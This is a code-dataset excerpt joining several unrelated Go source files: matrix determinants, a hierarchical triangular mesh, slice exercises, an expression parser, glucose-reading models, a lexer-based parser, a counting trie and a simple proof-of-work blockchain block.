func Det2x2(a [2][2]QQ) QQ {
m01 := a[0][0].Mul(a[1][1]).Sub(a[1][0].Mul(a[0][1]))
return m01
}
// Det3x3 -- computes the determinant of a 3x3 matrix.
func Det3x3(a [3][3]QQ) QQ {
m01 := a[0][0].Mul(a[1][1]).Sub(a[1][0].Mul(a[0][1]))
m02 := a[0][0].Mul(a[2][1]).Sub(a[2][0].Mul(a[0][1]))
m12 := a[1][0].Mul(a[2][1]).Sub(a[2][0].Mul(a[1][1]))
m012 := m01.Mul(a[2][2]).Sub(m02.Mul(a[1][2])).Add(m12.Mul(a[0][2]))
return m012
}
// Det4x4 -- computes the determinant of a 4x4 matrix.
func Det4x4(a [4][4]QQ) QQ {
m01 := a[1][0].Mul(a[0][1]).Sub(a[0][0].Mul(a[1][1]))
m02 := a[2][0].Mul(a[0][1]).Sub(a[0][0].Mul(a[2][1]))
m03 := a[3][0].Mul(a[0][1]).Sub(a[0][0].Mul(a[3][1]))
m12 := a[2][0].Mul(a[1][1]).Sub(a[1][0].Mul(a[2][1]))
m13 := a[3][0].Mul(a[1][1]).Sub(a[1][0].Mul(a[3][1]))
m23 := a[3][0].Mul(a[2][1]).Sub(a[2][0].Mul(a[3][1]))
m012 := m12.Mul(a[0][2]).Sub(m02.Mul(a[1][2])).Add(m01.Mul(a[2][2]))
m013 := m13.Mul(a[0][2]).Sub(m03.Mul(a[1][2])).Add(m01.Mul(a[3][2]))
m023 := m23.Mul(a[0][2]).Sub(m03.Mul(a[2][2])).Add(m02.Mul(a[3][2]))
m123 := m23.Mul(a[1][2]).Sub(m13.Mul(a[2][2])).Add(m12.Mul(a[3][2]))
m0123 := m123.Mul(a[0][3]).Sub(m023.Mul(a[1][3])).Add(m013.Mul(a[2][3])).Sub(m012.Mul(a[3][3]))
return m0123
}
// Det5x5 -- computes the determinant of a 5x5 matrix.
func Det5x5(a [5][5]QQ) QQ {
m01 := a[1][0].Mul(a[0][1]).Sub(a[0][0].Mul(a[1][1]))
m02 := a[2][0].Mul(a[0][1]).Sub(a[0][0].Mul(a[2][1]))
m03 := a[3][0].Mul(a[0][1]).Sub(a[0][0].Mul(a[3][1]))
m04 := a[4][0].Mul(a[0][1]).Sub(a[0][0].Mul(a[4][1]))
m12 := a[2][0].Mul(a[1][1]).Sub(a[1][0].Mul(a[2][1]))
m13 := a[3][0].Mul(a[1][1]).Sub(a[1][0].Mul(a[3][1]))
m14 := a[4][0].Mul(a[1][1]).Sub(a[1][0].Mul(a[4][1]))
m23 := a[3][0].Mul(a[2][1]).Sub(a[2][0].Mul(a[3][1]))
m24 := a[4][0].Mul(a[2][1]).Sub(a[2][0].Mul(a[4][1]))
m34 := a[4][0].Mul(a[3][1]).Sub(a[3][0].Mul(a[4][1]))
m012 := m12.Mul(a[0][2]).Sub(m02.Mul(a[1][2])).Add(m01.Mul(a[2][2]))
m013 := m13.Mul(a[0][2]).Sub(m03.Mul(a[1][2])).Add(m01.Mul(a[3][2]))
m014 := m14.Mul(a[0][2]).Sub(m04.Mul(a[1][2])).Add(m01.Mul(a[4][2]))
m023 := m23.Mul(a[0][2]).Sub(m03.Mul(a[2][2])).Add(m02.Mul(a[3][2]))
m024 := m24.Mul(a[0][2]).Sub(m04.Mul(a[2][2])).Add(m02.Mul(a[4][2]))
m034 := m34.Mul(a[0][2]).Sub(m04.Mul(a[3][2])).Add(m03.Mul(a[4][2]))
m123 := m23.Mul(a[1][2]).Sub(m13.Mul(a[2][2])).Add(m12.Mul(a[3][2]))
m124 := m24.Mul(a[1][2]).Sub(m14.Mul(a[2][2])).Add(m12.Mul(a[4][2]))
m134 := m34.Mul(a[1][2]).Sub(m14.Mul(a[3][2])).Add(m13.Mul(a[4][2]))
m234 := m34.Mul(a[2][2]).Sub(m24.Mul(a[3][2])).Add(m23.Mul(a[4][2]))
m0123 := m123.Mul(a[0][3]).Sub(m023.Mul(a[1][3])).Add(m013.Mul(a[2][3])).Sub(m012.Mul(a[3][3]))
m0124 := m124.Mul(a[0][3]).Sub(m024.Mul(a[1][3])).Add(m014.Mul(a[2][3])).Sub(m012.Mul(a[4][3]))
m0134 := m134.Mul(a[0][3]).Sub(m034.Mul(a[1][3])).Add(m014.Mul(a[3][3])).Sub(m013.Mul(a[4][3]))
m0234 := m234.Mul(a[0][3]).Sub(m034.Mul(a[2][3])).Add(m024.Mul(a[3][3])).Sub(m023.Mul(a[4][3]))
m1234 := m234.Mul(a[1][3]).Sub(m134.Mul(a[2][3])).Add(m124.Mul(a[3][3])).Sub(m123.Mul(a[4][3]))
m01234 := m1234.Mul(a[0][4]).Sub(m0234.Mul(a[1][4])).Add(m0134.Mul(a[2][4])).Sub(m0124.Mul(a[3][4])).Add(m0123.Mul(a[4][4]))
return m01234
} | dets.go | 0.684159 | 0.571109 | dets.go | starcoder |
package htm
import (
"fmt"
"azul3d.org/lmath.v1"
)
// Tree represents a node contained with an HTM.
type Tree struct {
Index int
Level int
Indices [3]int
Children [4]int
Parent int
}
func (t Tree) Empty() bool {
return t.Level == 0
}
func (t Tree) Equals(x Tree) bool {
return t.Index == x.Index && t.Level == x.Level && t.Parent == x.Parent &&
t.Indices[0] == x.Indices[0] && t.Indices[1] == x.Indices[1] && t.Indices[2] == x.Indices[2] &&
t.Children[0] == x.Children[0] && t.Children[1] == x.Children[1] &&
t.Children[2] == x.Children[2] && t.Children[3] == x.Children[3]
}
// HTM stores all nodes of the data structure along with edge data generated during subdivision.
type HTM struct {
*Edges
Vertices []lmath.Vec3
Trees []Tree
}
// New returns an HTM with the first eight nodes that create an octahedron initialized.
func New() *HTM {
h := &HTM{
Edges: &Edges{},
Vertices: []lmath.Vec3{
{0, 0, 1},
{1, 0, 0},
{0, 1, 0},
{-1, 0, 0},
{0, -1, 0},
{0, 0, -1},
},
Trees: []Tree{
{Index: 0, Level: 1, Indices: [3]int{1, 5, 2}}, // S0
{Index: 1, Level: 1, Indices: [3]int{2, 5, 3}}, // S1
{Index: 2, Level: 1, Indices: [3]int{3, 5, 4}}, // S2
{Index: 3, Level: 1, Indices: [3]int{4, 5, 1}}, // S3
{Index: 4, Level: 1, Indices: [3]int{1, 0, 4}}, // N0
{Index: 5, Level: 1, Indices: [3]int{4, 0, 3}}, // N1
{Index: 6, Level: 1, Indices: [3]int{3, 0, 2}}, // N2
{Index: 7, Level: 1, Indices: [3]int{2, 0, 1}}, // N3
},
}
// initialize edges for root nodes
for _, tr := range h.Trees {
i0, i1, i2 := tr.Indices[0], tr.Indices[1], tr.Indices[2]
h.Edges.Init(i1, i2)
h.Edges.Init(i0, i2)
h.Edges.Init(i0, i1)
}
return h
}
func (h *HTM) TreesNotEmpty() []Tree {
var trees []Tree
for _, t := range h.Trees {
if !t.Empty() {
trees = append(trees, t)
}
}
return trees
}
// Indices returns a slice of all vertex indices of the lowest subdivisions.
func (h *HTM) Indices() []uint32 {
indices := make([]uint32, 0, len(h.Trees))
for _, t := range h.Trees {
if !t.Empty() && t.Children[0] == 0 {
indices = append(indices, uint32(t.Indices[0]), uint32(t.Indices[1]), uint32(t.Indices[2]))
}
}
return indices
}
func (h *HTM) VerticesNotEmpty() []lmath.Vec3 {
var vertices []lmath.Vec3
for _, v := range h.Vertices {
if !(v.X == 0 && v.Y == 0 && v.Z == 0) {
vertices = append(vertices, v)
}
}
return vertices
}
// IndicesAt returns a node's indices.
func (h *HTM) IndicesAt(idx int) (i0, i1, i2 int) {
return h.Trees[idx].Indices[0], h.Trees[idx].Indices[1], h.Trees[idx].Indices[2]
}
// VerticesAt looks up a node's vertices from its indices.
func (h *HTM) VerticesAt(idx int) (v0, v1, v2 lmath.Vec3) {
i0, i1, i2 := h.IndicesAt(idx)
return h.Vertices[i0], h.Vertices[i1], h.Vertices[i2]
}
// VerticesFor looks up a node's vertices by the given node.
func (h *HTM) VerticesFor(t Tree) (v0, v1, v2 lmath.Vec3) {
return h.Vertices[t.Indices[0]], h.Vertices[t.Indices[1]], h.Vertices[t.Indices[2]]
}
// LevelAt returns a node's subdivision level. The eight root nodes are level one.
func (h *HTM) LevelAt(idx int) int { return h.Trees[idx].Level }
// EmptyAt identifies if the node at the given index has children. TODO(d) better name
func (h *HTM) EmptyAt(idx int) bool {
return h.Trees[idx].Children[0] == 0 || h.Trees[h.Trees[idx].Children[0]].Empty()
}
// ChildrenAt returns a node's children at the given index, but does not account for it that node is empty. TODO(d) better name
func (h *HTM) ChildrenAt(idx int) (a, b, c, d int) {
return h.Trees[idx].Children[0], h.Trees[idx].Children[1], h.Trees[idx].Children[2], h.Trees[idx].Children[3]
}
// TexCoords is a convenience method.
func (h *HTM) TexCoords() []float32 {
return TexCoords(h.VerticesNotEmpty())
}
// TexCoordsPlanar is a convenience method.
func (h *HTM) TexCoordsPlanar() []float32 {
return TexCoordsPlanar(h.VerticesNotEmpty())
}
// SubDivide starts a recursive subdivision along all eight root nodes.
func (h *HTM) SubDivide(level int) {
SubDivide(h, 0, level)
SubDivide(h, 1, level)
SubDivide(h, 2, level)
SubDivide(h, 3, level)
SubDivide(h, 4, level)
SubDivide(h, 5, level)
SubDivide(h, 6, level)
SubDivide(h, 7, level)
}
// LookupByCart looks up which triangle a given object belongs to by it's given cartesian coordinates.
func (h *HTM) LookupByCart(v lmath.Vec3) (Tree, error) {
i := -1
// Only one of these will recurse within first call.
LookupByCart(h, 0, v, &i)
LookupByCart(h, 1, v, &i)
LookupByCart(h, 2, v, &i)
LookupByCart(h, 3, v, &i)
LookupByCart(h, 4, v, &i)
LookupByCart(h, 5, v, &i)
LookupByCart(h, 6, v, &i)
LookupByCart(h, 7, v, &i)
if i != -1 {
return h.Trees[i], nil
}
return Tree{}, fmt.Errorf("Failed to lookup triangle by given cartesian coordinates: %v", v)
}
// Intersections returns a slice of node indices that fully or partially match a constraint. If a parent
// node fully matches, the parents children will not be returned in the results.
func (h *HTM) Intersections(t Tester) []int {
var mt []int
Intersections(h, 0, t, &mt)
Intersections(h, 1, t, &mt)
Intersections(h, 2, t, &mt)
Intersections(h, 3, t, &mt)
Intersections(h, 4, t, &mt)
Intersections(h, 5, t, &mt)
Intersections(h, 6, t, &mt)
Intersections(h, 7, t, &mt)
return mt
}
func (h *HTM) Compact() {
h.Vertices = h.VerticesNotEmpty()
h.Trees = h.TreesNotEmpty()
}
func (h *HTM) CullToLevel(lvl int) {
for i, t := range h.Trees {
if t.Level == lvl && t.Children[0] != 0 {
Cull(h, i)
}
}
} | htm.go | 0.737442 | 0.588505 | htm.go | starcoder |
Coding Exercise #1
Using a composite literal declare and initialize a slice of type string with 3 elements.
Iterate over the slice and print each element in the slice and its index.
Are you stuck? Do you want to see the solution for this exercise? Click https://play.golang.org/p/CRPEvm-A31h.
Coding Exercise #2
There are some errors in the following Go program. Try to identify the errors, change the code and run the program without errors.
package main
import "fmt"
func main() {
mySlice := []float64{1.2, 5.6}
mySlice[2] = 6
a := 10
mySlice[0] = a
mySlice[3] = 10.10
mySlice = append(mySlice, a)
fmt.Println(mySlice)
}
Are you stuck? Do you want to see the solution for this exercise? Click https://play.golang.org/p/gVw5_PnrM-h.
Coding Exercise #3
1. Declare a slice called nums with three float64 numbers.
2. Append the value 10.1 to the slice
3. In one statement append to the slice the values: 4.1, 5.5 and 6.6
4. Print out the slice
5. Declare a slice called n with two float64 values
6. Append n to nums
7. Print out the nums slice
Are you stuck? Do you want to see the solution for this exercise? Click https://play.golang.org/p/RNWABjmI2Le.
Coding Exercise #4
Create a Go program that reads some numbers from the command line and then calculates the sum and the product of all the numbers given at command line.
The user should give between 2 and 10 numbers.
Notes:
- the program should be run in a terminal (go run main.go) not in Go Playground
- example:
go run main.go 3 2 5
Expected output: Sum: 10, Product: 30
Are you stuck? Do you want to see the solution for this exercise? Click https://play.golang.org/p/HEaHKVj30qa.
Coding Exercise #5
Consider the following slice declaration: nums := []int{5, -1, 9, 10, 1100, 6, -1, 6}
Using a slice expression and a for loop iterate over the slice ignoring the first and the last two elements.
Print those elements and their sum.
Are you stuck? Do you want to see the solution for this exercise? Click https://play.golang.org/p/GbHEibG1t3p.
Coding Exercise #6
Consider the following slice declaration: friends := []string{"Marry", "John", "Paul", "Diana"}
Using copy() function create a copy of the slice. Prove that the slices are not connected by modifying one slice and notice that the other slice is not modified.
Are you stuck? Do you want to see the solution for this exercise? Click https://play.golang.org/p/wx9qjwBN-qC.
Coding Exercise #7
Consider the following slice declaration: friends := []string{"Marry", "John", "Paul", "Diana"}
Using append() function create a copy of the slice. Prove that the slices are not connected by modifying one slice and notice that the other slice is not modified.
Are you stuck? Do you want to see the solution for this exercise? Click https://play.golang.org/p/v_uzg5V_OvH.
Coding Exercise #8
Consider the following slice declaration:
years := []int{2000, 2001, 2002, 2003, 2004, 2005, 2006, 2007, 2008, 2009, 2010}
Using a slice expression and append() function create a new slice called newYears that contains the first 3 and the last 3 elements of the slice. newYears should be []int{2000, 2001, 2002, 2008, 2009, 2010}
Are you stuck? Do you want to see the solution for this exercise? Click https://play.golang.org/p/QyGtkDU_w_j. | more_code/coding_tasks/slices/tasks.go | 0.872944 | 0.69653 | tasks.go | starcoder |
package ast
import (
"os"
"github.com/fabulousduck/smol/errors"
"github.com/fabulousduck/smol/lexer"
)
//Expression contains nodes in RPN form
type Expression struct {
Tokens []lexer.Token
}
func createExpression(nodes []lexer.Token) Expression {
expression := Expression{Tokens: nodes}
return expression
}
//GetNodeName so its valid on the node interface
//and we can ask what type it is later
func (e Expression) GetNodeName() string {
return "expression"
}
//VariableReference contains the name of a referenced variable during AST generation
type VariableReference struct {
name string
}
//GetNodeName so its valid on the node interface
//and we can ask what type it is later
func (vr VariableReference) GetNodeName() string {
return "variableReference"
}
func createVariableReference(name string) VariableReference {
return VariableReference{name: name}
}
//Operator is a symbol that operates on one or more sides
type Operator struct {
value string
}
//GetNodeName is a generic function that allows subtypes of a node in the AST
func (o Operator) GetNodeName() string {
return "operator"
}
//Symbol is a character that is not and operator or a latin character / numeral
type Symbol struct {
value string
}
//GetNodeName is a generic function that allows subtypes of a node in the AST
func (s Symbol) GetNodeName() string {
return "symbol"
}
//Litteral is a node type for static values such as integers and string litterals
type Litteral struct {
ltype string
value string
}
//GetNodeName is a generic function that allows subtypes of a node in the AST
func (l Litteral) GetNodeName() string {
return "litteral"
}
//CreateLitteral creates a new Litteral struct
func CreateLitteral(value string, ltype string) Litteral {
litteral := Litteral{value: value, ltype: ltype}
return litteral
}
//CreateSymbol takes a string and returns it wrapped in a node like
func CreateSymbol(value string) Symbol {
return Symbol{value: value}
}
/*
readExpression turns a set of nodes into a expression using shunting yard
*/
func (p *Parser) readExpression() Expression {
expressionLine := p.currentToken().Line
expressionTokens := []lexer.Token{}
//gather all tokens of the expression into a slice
for currTok := p.currentToken(); currTok.Line == expressionLine; currTok = p.currentToken() {
expressionTokens = append(expressionTokens, currTok)
p.advance()
if !p.nextExists() {
expressionTokens = append(expressionTokens, p.currentToken())
break
}
}
expressionParser := NewParser(p.Filename, expressionTokens)
switch len(expressionTokens) {
case 0:
errors.ExpectedExpressionError()
os.Exit(65)
break
case 1:
if lexer.IsLitteral(expressionTokens[0]) {
litteralToken := expressionTokens[0]
return createExpression([]lexer.Token{litteralToken})
}
errors.InvalidOperatorError()
os.Exit(65)
break
default:
return expressionParser.parseExpression()
}
return createExpression([]lexer.Token{})
}
/*
readExpressionUntil allows for parsing and expression with a defined
symbol as an end boundary.
This is used for when we parse inside of function calls
*/
func (p *Parser) readExpressionUntil(tokValues []string) (Expression, string) {
expressionTokens := []lexer.Token{}
fnContext := false
delimFound := ""
for i := 0; i < len(p.Tokens); i++ {
if containsStr(tokValues, p.currentToken().Value) && !fnContext {
delimFound = p.currentToken().Value
break
}
if p.currentToken().Value == "(" {
fnContext = true
}
if p.currentToken().Value == ")" && fnContext {
fnContext = false
}
expressionTokens = append(expressionTokens, p.currentToken())
p.advance()
}
expressionParser := NewParser(p.Filename, expressionTokens)
expressionParser.Tokens = expressionTokens
switch len(expressionTokens) {
case 0:
errors.ExpectedExpressionError()
os.Exit(65)
break
case 1:
if lexer.IsLitteral(expressionTokens[0]) {
return createExpression([]lexer.Token{expressionTokens[0]}), delimFound
}
errors.InvalidOperatorError()
os.Exit(65)
break
default:
return expressionParser.parseExpression(), delimFound
}
return createExpression([]lexer.Token{}), delimFound
}
func (p *Parser) parseExpression() Expression {
operatorStack := []lexer.Token{}
outputQueue := []lexer.Token{}
for p.TokensConsumed < len(p.Tokens) {
token := p.currentToken()
switch token.Type {
case "comma":
p.advance()
break
case "integer":
outputQueue = append(outputQueue, token)
p.advance()
break
case "less_than":
fallthrough
case "greater_than":
fallthrough
case "exponent":
fallthrough
case "division":
fallthrough
case "star":
fallthrough
case "plus":
fallthrough
case "dash":
if len(operatorStack) >= 1 {
for len(operatorStack) != 0 {
stackTopAttributes := lexer.GetOperatorAttributes(top(operatorStack).Type)
tokenAttributes := lexer.GetOperatorAttributes(token.Type)
hasHigherPrec := top(operatorStack).HasHigherPrec(token)
eqRule := stackTopAttributes.Precedance == tokenAttributes.Precedance && tokenAttributes.Associativity == "left"
parenNotTop := top(operatorStack).Type != "left_parenthesis"
if (hasHigherPrec || eqRule) && parenNotTop {
outputQueue = append(outputQueue, top(operatorStack))
operatorStack = (operatorStack)[:len(operatorStack)-1]
} else {
break
}
}
}
operatorStack = append(operatorStack, token)
p.advance()
break
case "left_parenthesis":
operatorStack = append(operatorStack, token)
p.advance()
break
case "right_parenthesis":
for top(operatorStack).Value != "(" {
outputQueue = append(outputQueue, top(operatorStack))
operatorStack = (operatorStack)[:len(operatorStack)-1]
}
if top(operatorStack).Value == "(" {
operatorStack = (operatorStack)[:len(operatorStack)-1]
}
p.advance()
break
case "character":
fallthrough
case "string":
if p.nextExists() && p.nextToken().Type == "left_parenthesis" {
outputQueue = append(outputQueue, token)
} else {
operatorStack = append(operatorStack, token)
}
p.advance()
break
}
}
if len(operatorStack) != 0 {
for i := len(operatorStack); 0 < i; i-- {
outputQueue = append(outputQueue, operatorStack[i-1])
operatorStack = (operatorStack)[:len(operatorStack)-1]
}
}
return createExpression(outputQueue)
}
func top(sl []lexer.Token) lexer.Token {
return sl[len(sl)-1]
}
func containsStr(a []string, b string) bool {
for i := 0; i < len(a); i++ {
if a[i] == b {
return true
}
}
return false
} | ast/expression.go | 0.704668 | 0.464659 | expression.go | starcoder |
package apimodel
import (
"errors"
"fmt"
"github.com/alexandre-normand/glukit/app/util"
"time"
)
const (
GLUCOSE_READ_TAG = "GlucoseRead"
// Units
MMOL_PER_L = "mmolPerL"
MG_PER_DL = "mgPerDL"
UNKNOWN_GLUCOSE_MEASUREMENT_UNIT = "Unknown"
)
type GlucoseUnit string
// GlucoseRead represents a CGM read (not to be confused with a MeterRead which is a calibration value from an external
// meter
type GlucoseRead struct {
Time Time `json:"time" datastore:"time,noindex"`
Unit GlucoseUnit `json:"unit" datastore:"unit,noindex"`
Value float32 `json:"value" datastore:"value,noindex"`
}
// This holds an array of reads for a whole day
type DayOfGlucoseReads struct {
Reads []GlucoseRead `datastore:"reads,noindex"`
StartTime time.Time `datastore:"startTime"`
EndTime time.Time `datastore:"endTime"`
}
func NewDayOfGlucoseReads(reads []GlucoseRead) DayOfGlucoseReads {
return DayOfGlucoseReads{reads, reads[0].GetTime().Truncate(DAY_OF_DATA_DURATION), reads[len(reads)-1].GetTime()}
}
// GetTime gets the time of a Timestamp value
func (element GlucoseRead) GetTime() time.Time {
return element.Time.GetTime()
}
// GetNormalizedValue gets the normalized value to the requested unit
func (element GlucoseRead) GetNormalizedValue(unit GlucoseUnit) (float32, error) {
if unit == element.Unit {
return element.Value, nil
}
if element.Unit == UNKNOWN_GLUCOSE_MEASUREMENT_UNIT {
return element.Value, nil
}
// This switch can focus on only conversion cases because the obvious
// cases have been sorted out already
switch unit {
case MMOL_PER_L:
return element.Value * 0.0555, nil
case MG_PER_DL:
return element.Value * 18.0182, nil
default:
return -1., errors.New(fmt.Sprintf("Bad unit requested, [%s] is not one of [%s, %s]", unit, MG_PER_DL, MMOL_PER_L))
}
}
type GlucoseReadSlice []GlucoseRead
func (slice GlucoseReadSlice) Len() int {
return len(slice)
}
func (slice GlucoseReadSlice) Less(i, j int) bool {
return slice[i].Time.Timestamp < slice[j].Time.Timestamp
}
func (slice GlucoseReadSlice) Swap(i, j int) {
slice[i], slice[j] = slice[j], slice[i]
}
func (slice GlucoseReadSlice) Get(i int) float64 {
return float64(slice[i].Value)
}
func (slice GlucoseReadSlice) GetEpochTime(i int) (epochTime int64) {
return slice[i].Time.Timestamp / 1000
}
// ToDataPointSlice converts a GlucoseReadSlice into a generic DataPoint array
func (slice GlucoseReadSlice) ToDataPointSlice(glucoseUnit GlucoseUnit) (dataPoints []DataPoint) {
dataPoints = make([]DataPoint, len(slice))
for i := range slice {
localTime, err := slice[i].Time.Format()
if err != nil {
util.Propagate(err)
}
// It's pretty terrible if this happens and we crash the app but this is a coding error and I want to know early
convertedValue, err := slice[i].GetNormalizedValue(glucoseUnit)
if err != nil {
util.Propagate(err)
}
dataPoint := DataPoint{localTime, slice.GetEpochTime(i), convertedValue, convertedValue, GLUCOSE_READ_TAG, glucoseUnit}
dataPoints[i] = dataPoint
}
return dataPoints
}
var UNDEFINED_GLUCOSE_READ = GlucoseRead{Time{GetTimeMillis(util.GLUKIT_EPOCH_TIME), "UTC"}, "NONE", UNDEFINED_READ} | app/apimodel/glucoseread.go | 0.732113 | 0.400808 | glucoseread.go | starcoder |
package parse
import (
"fmt"
"github.com/orange-lang/orange/pkg/ast"
"github.com/orange-lang/orange/pkg/lexer"
"github.com/orange-lang/orange/pkg/token"
)
type parser struct {
stream lexer.LexemeStream
}
// Parse takes a lexeme stream and returns an AST. Consumes the entire
// lexeme stream, and returns a list of errors for each parsing error.
func Parse(s lexer.LexemeStream) (ast ast.AST, errors []error) {
p := parser{stream: s}
return p.parse()
}
func (p parser) parse() (ast ast.AST, errs []error) {
errs = []error{}
for !p.stream.EOF() {
if ok := p.allowFrom(isStatementTerminator); ok {
continue
}
node, err := p.parseNodeWithRecovery()
if err != nil {
errs = append(errs, err)
continue
}
ast.Nodes = append(ast.Nodes, node)
}
return
}
func (p parser) parseNodeWithRecovery() (node ast.Node, err error) {
defer func() {
if r := recover(); r != nil {
err = r.(error)
}
}()
node = p.parseNode()
p.expectFrom(isStatementTerminator)
return node, err
}
func (p parser) parseBlock() *ast.BlockStmt {
p.nextConcrete(token.OpenCurly)
nodes := []ast.Node{}
for !p.stream.EOF() {
if ok := p.allowFrom(isStatementTerminator); ok {
continue
}
if ok := p.peekFrom(isNodeToken); !ok {
break
}
nodes = append(nodes, p.parseNode())
if ok := p.peek(token.CloseCurly); ok {
break
}
p.expectFrom(isStatementTerminator)
}
p.expect(token.CloseCurly)
return &ast.BlockStmt{Nodes: nodes}
}
func isNodeToken(t token.Token) bool {
return isExpressionToken(t) || isStatementToken(t)
}
func (p parser) parseNode() ast.Node {
lexeme, _ := p.stream.Peek()
var node ast.Node
switch true {
case isExpressionToken(lexeme.Token):
node = p.parseExpr()
case isStatementToken(lexeme.Token):
node = p.parseStatement()
default:
p.consumeUntilTerminator()
panic(fmt.Errorf("Unexpected lexeme %v; expected statement", lexeme.Value))
}
return node
}
func isStatementTerminator(t token.Token) bool {
return t == token.Semicolon || t == token.Newline || t == token.EOF
}
func (p parser) consumeTerminators() {
for p.allowFrom(isStatementTerminator) {
// Do nothing
}
}
func (p parser) consumeUntilTerminator() {
lexeme, _ := p.stream.Peek()
for !p.stream.EOF() && !isStatementTerminator(lexeme.Token) {
p.stream.Next()
}
}
func (p parser) peekFrom(c func(token.Token) bool) bool {
lexeme, _ := p.stream.Peek()
if c(lexeme.Token) {
return true
}
return false
}
func (p parser) peek(t token.Token) bool {
lexeme, _ := p.stream.Peek()
if lexeme.Token == t {
return true
}
return false
}
func (p parser) allowFrom(c func(token.Token) bool) bool {
lexeme, _ := p.stream.Peek()
if c(lexeme.Token) {
p.stream.Next()
return true
}
return false
}
func (p parser) allow(t token.Token) bool {
lexeme, _ := p.stream.Peek()
if lexeme.Token == t {
p.stream.Next()
return true
}
return false
}
func (p parser) expectFrom(c func(token.Token) bool) lexer.Lexeme {
lexeme, err := p.stream.Next()
if err != nil {
panic(err)
} else if !c(lexeme.Token) {
panic(fmt.Errorf("Unexpected %v", lexeme.Token))
}
return lexeme
}
func (p parser) expect(t token.Token) lexer.Lexeme {
lexeme, err := p.stream.Next()
if err != nil {
panic(err)
} else if lexeme.Token != t {
panic(fmt.Errorf("Expected %v, got %v", t, lexeme.Token))
}
return lexeme
}
// Gets the next non-whitespace token.
func (p parser) nextConcrete(t token.Token) lexer.Lexeme {
lexeme, err := p.stream.Next()
for lexeme.Token == token.Newline {
lexeme, err = p.stream.Next()
}
if err != nil {
panic(err)
} else if lexeme.Token != t {
panic(fmt.Errorf("Expected %v, got %v", t, lexeme.Token))
}
return lexeme
} | pkg/parse/parser.go | 0.705684 | 0.400515 | parser.go | starcoder |
package lm
import "errors"
// WordCount is a count of a corresponding path
type WordCount = uint32
// TrieIterator is a callback that is called for each path of the given trie
type TrieIterator = func(path Sentence, count WordCount) error
// CountTrie represents a data structure for counting ngrams.
type CountTrie interface {
// Put increments WordCount for last element of given sequence.
Put(sentence Sentence, count WordCount)
// Walk iterates through trie and calls walker function on each element.
Walk(walker TrieIterator) error
}
// ErrInvalidIndex tells that there is not data for the provided index index
var ErrInvalidIndex = errors.New("index is not exists")
// NewCountTrie creates new a instance of CountTrie
func NewCountTrie() CountTrie {
return &countTrie{
root: &node{
children: make(childrenTable),
count: 0,
},
depth: 0,
table: map[Token]uint32{},
holder: []Token{},
}
}
// countTrie implements a Trie data structure
type countTrie struct {
root *node
depth int
table map[Token]uint32
holder []Token
}
// node represents a trie element
type node struct {
children childrenTable
count WordCount
}
// childrenTable represents a map for children of the given node
type childrenTable map[uint32]*node
// Put increments WordCount for the last element of the given sequence.
func (t *countTrie) Put(sentence Sentence, count WordCount) {
if len(sentence) > t.depth {
t.depth = len(sentence)
}
n := t.root
for _, word := range sentence {
w := t.mapToUint32(word)
child := n.children[w]
if child == nil {
if n.children == nil {
n.children = make(childrenTable)
}
child = &node{
children: nil,
count: 0,
}
n.children[w] = child
}
n = child
}
n.count += count
}
// Walk iterates through the trie and calls the walker function on each element.
func (t *countTrie) Walk(walker TrieIterator) (err error) {
if t.depth == 0 {
return nil
}
defer func() {
if r := recover(); r != nil {
err, _ = r.(error)
}
}()
path := make([]Token, t.depth)
t.root.iterate(t, 0, path, walker)
return err
}
// mapToUint32 maps the given token to a index value
func (t *countTrie) mapToUint32(token Token) uint32 {
index, ok := t.table[token]
if !ok {
index = uint32(len(t.holder))
t.table[token] = index
t.holder = append(t.holder, token)
}
return index
}
// mapFromUint32 restores a token from the given index
func (t *countTrie) mapFromUint32(index uint32) (Token, error) {
if uint32(len(t.holder)) <= index {
return UnknownWordSymbol, ErrInvalidIndex
}
return t.holder[int(index)], nil
}
// iterate iterates through the given depth and calls the iterator on each path
func (n *node) iterate(trie *countTrie, depth int, path []Token, iterator TrieIterator) {
if n.count > 0 {
if err := iterator(path[:depth], n.count); err != nil {
panic(err)
}
}
if n.children == nil {
return
}
for w, child := range n.children {
token, err := trie.mapFromUint32(w)
if err != nil {
panic(err)
}
path[depth] = token
child.iterate(trie, depth+1, path, iterator)
}
} | pkg/lm/count_trie.go | 0.770896 | 0.566738 | count_trie.go | starcoder |
package blockchain
import (
"bytes"
"crypto/sha256"
"encoding/gob"
"encoding/hex"
"encoding/json"
"github.com/samuelvl/blockchain-lab/pkg/pow"
)
// Difficulty of the hashcash algorithm to compute the nonce. The closer to 256,
// the harder to find a nonce.
const Difficulty uint = 16
// Block represents the simplest element of the chain. It stores some data,
// its corresponding hash and the hash from the previous block.
// The previous hash will be empty if it is the first block of the chain.
type Block struct {
Data []byte `json:"data"`
Hash string `json:"hash"`
PrevHash string `json:"prevHash"`
Nonce int32 `json:"nonce"`
}
// NewBlock returns a block with its corresponding hash.
func NewBlock(data []byte, prevHash string) *Block {
block := Block{
Data: data,
Hash: "",
PrevHash: prevHash,
Nonce: 0,
}
block.ComputeHash()
block.Mine()
return &block
}
// FirstBlock returns the first block of the chain from the "Genesis" string.
func FirstBlock() *Block {
return NewBlock([]byte("Genesis"), "")
}
// ComputeHash computes block's hash using the sha256 algorithm:
// https://datatracker.ietf.org/doc/html/rfc6234
func (b *Block) ComputeHash() {
// The payload is the concatenation of the block's data and the previous
// hash, this is join[data, padding, prevHash]. No padding is added between
// the data and the previous hash.
padding := []byte{}
payload := bytes.Join([][]byte{b.Data, []byte(b.PrevHash)}, padding)
// Set the hash value as the sha256 of the payload
hash := sha256.Sum256(payload)
b.Hash = hex.EncodeToString(hash[:])
}
// Mine will recompute the block's hash using the Proof of Work "hashcat"
// algorithm.
func (b *Block) Mine() error {
nonce, err := pow.FindNonce([]byte(b.Hash), Difficulty)
if err != nil {
return err
}
b.Hash = hex.EncodeToString(nonce.Payload)
b.Nonce = nonce.Value
return nil
}
// Serialize converts a block in an slice of bytes. Implemented using the gob
// library.
func (b *Block) Serialize() ([]byte, error) {
buffer := new(bytes.Buffer)
serializer := gob.NewEncoder(buffer)
err := serializer.Encode(b)
if err != nil {
return nil, err
}
return buffer.Bytes(), nil
}
// Deserialize converts an slice of bytes in a block. Implemented using the gob
// library.
func (b *Block) Deserialize(data []byte) error {
buffer := bytes.NewBuffer(data)
serializer := gob.NewDecoder(buffer)
err := serializer.Decode(b)
if err != nil {
return err
}
return nil
}
// String prints the block in json format.
func (b Block) String() string {
jsonBlock, _ := json.MarshalIndent(b, "", " ")
return string(jsonBlock)
} | pkg/blockchain/block.go | 0.832373 | 0.405478 | block.go | starcoder |
package main
import "fmt"
/*
